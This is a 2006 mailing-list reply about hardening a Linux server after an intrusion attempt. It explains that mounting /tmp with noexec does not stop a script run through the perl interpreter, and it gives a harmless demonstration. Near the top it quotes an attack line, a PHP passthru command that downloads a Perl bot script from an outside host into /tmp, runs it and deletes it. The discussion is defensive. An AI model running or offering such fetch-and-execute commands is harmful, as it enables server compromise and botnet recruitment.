On Saturday 09 September 2006 16:44, Darrell D. Mobley wrote:> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl> v6.txt;rm -f v6*');> [::snip::]> The v6.txt is a Perl script that installs some IRC software and monitors> IRC on open ports. I do not think the script was successful in running,> but I just want to make sure the /TMP security is enabled where files can='t> be run there. While I don't think the DDOS attack was successful in> running the script, it was successful in shutting down the serer due to> MySQL becoming overwhelmed. Server load was up to 156!>> Any suggestions would be appreciated.Having /tmp flags of noexec,nosuid helps against the clueless script kiddie=s, but in your case it wouldn't prevent the code in v6.txt from being executed.One example:[root tmp]# mount | grep /tmp/home/dev/tmpMnt on /home/tmp type ext2 (rw,noexec,nosuid,loop=/dev/loop0)[root tmp]# pwd/home/tmp[root tmp]# ls -l hi.pl-rw-r--r-- 1 root root 40 Sep 12 15:02 hi.pl[root tmp]# cat hi.pl#!/usr/bin/perlprint "Hello World!\n";[root tmp]# perl hi.plHello World![root tmp]#My /tmp has noexec and yet I'm still able to execute the perl script. This= is because the perl program is being executed (from /usr/bin/perl) and it's interpreting the commands in the hi.pl file. If I were to make hi.pl executable and try to execute that file directly, it would be denied.[root tmp]# chmod 755 hi.pl[root tmp]# ls -l hi.pl-rwxr-xr-x 1 root root 40 Sep 12 15:02 hi.pl[root tmp]# ./hi.plsh: ./hi.pl: Permission denied[root tmp]#Hopefully this helps you understand a little more about the capabilities an=d limitations of the noexec flag on a mounted partition.Kevin Bonnerattatchment (application/pgp-signature) ignored